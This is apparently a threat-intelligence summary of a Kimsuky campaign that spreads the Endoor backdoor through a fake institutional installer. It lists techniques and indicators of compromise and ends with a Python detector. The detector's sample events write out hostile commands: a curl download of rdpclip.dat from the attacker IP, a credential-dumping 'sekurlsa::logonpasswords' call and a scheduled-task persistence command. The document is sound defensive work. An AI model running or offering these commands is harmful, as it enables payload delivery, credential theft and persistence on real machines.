Malicious code disguised as installation files of domestic public institutions (Kimsuky group)

AhnLab ASEC warns that the Kimsuky group distributed a signed dropper pretending to be an installer for a Korean public institution, which unpacks an encrypted payload and deploys the Endoor backdoor. The dropper extracts src.rar using the password “1q2w3e4r”, installs Endoor as %USERPROFILE%\svchost.exe, registers a scheduled task named “Windows Backup”, and the backdoor communicates with C2 domains including ngrok-free[.]app. #Kimsuky #Endoor

Keypoints

  • Attackers used a signed dropper masquerading as an installer for a domestic public institution to lure execution.
  • The dropper contains an internal archive (src.rar) and an embedded unrar.exe; extraction uses password “1q2w3e4r”.
  • The deployed backdoor (Endoor), written in Go, copies itself to %USERPROFILE%\svchost.exe and registers a scheduled task named “Windows Backup” to persist.
  • Endoor supports command execution, file upload/download, process control, and a Socks5 proxy, and communicates with C2 domains including ngrok-free[.]app.
  • Operators fetched additional payloads via curl (e.g., rdpclip.dat), deployed credential-stealing tools (Mimikatsu) and a screenshot-stealer using kbinani/screenshot, exfiltrating via a local proxy.
  • Nikidoor, another Kimsuky backdoor, shares C2 infrastructure and was also observed in related incidents.

MITRE Techniques

  • [T1204] User Execution – The dropper was distributed as an installation file to prompt user execution (‘the dropper malware was disguised as an installation file for a specific public institution in Korea.’).
  • [T1036] Masquerading – Malicious binary used institution logo and version metadata to appear legitimate (‘The icon was used as the logo of the relevant public institution, and related keywords can be found on the version information or installation page.’).
  • [T1553] Signed Binary Proxy Execution/Code Signing – Malware was signed with a valid certificate to evade suspicion (‘signing with a valid certificate from a domestic company.’).
  • [T1053] Scheduled Task/Job – The backdoor registers a scheduled task named “Windows Backup” to achieve persistence (‘registers itself in the task scheduler under the name “Windows Backup.”’).
  • [T1105] Ingress Tool Transfer – Operators downloaded additional binaries externally using curl (saved as rdpclip.dat) to update implants (‘downloaded externally using Curl under the name “rdpclip.dat”’).
  • [T1071] Application Layer Protocol – Endoor uses web-based C2 channels, notably ngrok-free[.]app, for command-and-control (‘using Ngrok’s free domain address “ngrok-free[.]app” as its C&C server.’).
  • [T1003] Credential Dumping – Attackers executed a credential-stealing tool with sekurlsa commands to harvest credentials (‘the “sekurlsa::logonpasswords” argument was confirmed in the execution log’).
  • [T1113] Screen Capture – A malicious component captured and exfiltrated screenshots using kbinani/screenshot (‘the malware was created using Kbinani’s screenshot library … the attacker implemented a function to not only capture screenshots but also leak them.’).
  • [T1090] Proxy – The backdoor supports Socks5 proxy functionality to route traffic or exfiltrate data (‘supports functions such as command execution, file upload and download, process operation, and Socks5 proxy.’).

Indicators of Compromise

  • [MD5] File hashes – b74efd8470206a20175d723c14c2e872 (Dropper signed as App.exe), 7034268d1c52539ea0cd48fd33ae43c4 (Endoor svchost.exe), and 3 more hashes.
  • [C2 Address] Command-and-control domains – real-joey-nicely.ngrok-free[.]app/mir/index.php, fitting-discrete-lemur.ngrok-free[.]app/minish/index.php, and minish.wiki[.]gd (shared infrastructure).
  • [Download URL] External payloads – hxxp://210.16.120[.]210/rdpclip.dat (presumed Endoor download), hxxp://minish.wiki[.]gd/eng.db (additional Endoor sample confirmed).
  • [File Names] Deployed filenames/paths – %USERPROFILE%\svchost.exe (Endoor persistence), %ALLUSERSPROFILE%\cache.exe (Mimikatsu), rdpclip.dat (downloaded payload).

The technical infection chain begins with a signed dropper crafted to look like an installer for a domestic public institution: it carries institution-specific icons and metadata to entice execution. When run, the dropper drops an internal archive named src.rar and an embedded unrar.exe, then uses the hardcoded password “1q2w3e4r” to extract the payload and run a backdoor binary.

The extracted backdoor, identified as Endoor and written in Go, accepts an “install” argument to self-copy to %USERPROFILE%\svchost.exe and then registers itself as a scheduled task called “Windows Backup”, executed with a “backup” argument, for persistence. Endoor communicates with C2 servers (notably ngrok-free[.]app), supports command execution, file upload/download, process control, and provides a Socks5 proxy, enabling remote control and tunneled traffic.

Post-compromise actions observed include fetching additional binaries via curl (saved as rdpclip.dat), deploying credential theft tooling (Mimikatsu executed with “sekurlsa::logonpasswords”), and running a screenshot-stealer built on kbinani/screenshot that posts captures to a local endpoint (hxxp://127.0.0.1:8080/recv) — indicating use of local proxies to stage exfiltration. Related backdoors (Nikidoor) share C2 infrastructure and were observed in parallel incidents.
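As an added defender-side example (not code from the ASEC report), the Python rules below match the behaviours described in the chain above against constructed Sysmon-style events: the hardcoded unrar password, the “Windows Backup” task, svchost.exe outside a system directory, ngrok-free.app lookups, the curl fetch of rdpclip.dat, and the sekurlsa::logonpasswords argument. The event field names and sample values are assumptions for illustration, not telemetry from the report.

```python
import ntpath
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]

# Constructed Sysmon-style telemetry for this example, not log data from the ASEC report.
SAMPLE_EVENTS: List[Event] = [
    {"type": "process", "image": r"C:\Users\victim\AppData\Local\Temp\unrar.exe",
     "cmdline": "unrar.exe x -p1q2w3e4r src.rar"},
    {"type": "process", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /tn "Windows Backup" /tr "C:\Users\victim\svchost.exe backup"'},
    {"type": "process", "image": r"C:\Users\victim\svchost.exe", "cmdline": "svchost.exe backup"},
    {"type": "dns", "query": "real-joey-nicely.ngrok-free.app"},
    {"type": "process", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl -o rdpclip.dat http://210.16.120.210/rdpclip.dat"},
    {"type": "process", "image": r"C:\ProgramData\cache.exe", "cmdline": 'cache.exe "sekurlsa::logonpasswords"'},
    # Benign activity that must not fire: the genuine svchost.exe and an ordinary DNS lookup.
    {"type": "process", "image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"type": "dns", "query": "update.microsoft.com"},
]

SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}

def _name(ev: Event) -> str:  # image file name, lower-cased
    return ntpath.basename(ev.get("image", "")).lower()

def _cmd(ev: Event) -> str:  # command line, lower-cased
    return ev.get("cmdline", "").lower()

# Each rule is (name, predicate); names follow the behaviours the report describes.
RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    ("svchost.exe running outside a system directory",
     lambda ev: ev["type"] == "process" and _name(ev) == "svchost.exe"
     and ntpath.dirname(ev["image"]).lower() not in SYSTEM_DIRS),
    ("scheduled task 'Windows Backup' created with schtasks",
     lambda ev: ev["type"] == "process" and "schtasks" in _cmd(ev) and "windows backup" in _cmd(ev)),
    ("archive extracted with the dropper's hardcoded password",
     lambda ev: ev["type"] == "process" and "1q2w3e4r" in _cmd(ev)),
    ("DNS query for a ngrok-free.app host",
     lambda ev: ev["type"] == "dns" and ev["query"].lower().endswith(".ngrok-free.app")),
    ("curl fetching rdpclip.dat",
     lambda ev: ev["type"] == "process" and _name(ev) == "curl.exe" and "rdpclip.dat" in _cmd(ev)),
    ("sekurlsa::logonpasswords on the command line",
     lambda ev: ev["type"] == "process" and "sekurlsa::logonpasswords" in _cmd(ev)),
]

def detect(events: List[Event]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for each rule that matches each event, in event order."""
    return [(i, name) for i, ev in enumerate(events) for name, pred in RULES if pred(ev)]
```

Running `detect(SAMPLE_EVENTS)` flags the six malicious events and stays silent on the System32 svchost.exe and the benign DNS query; in a real deployment the same predicates would be fed from Sysmon event IDs 1 (process creation) and 22 (DNS query).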

Read more: https://asec.ahnlab.com/ko/62117/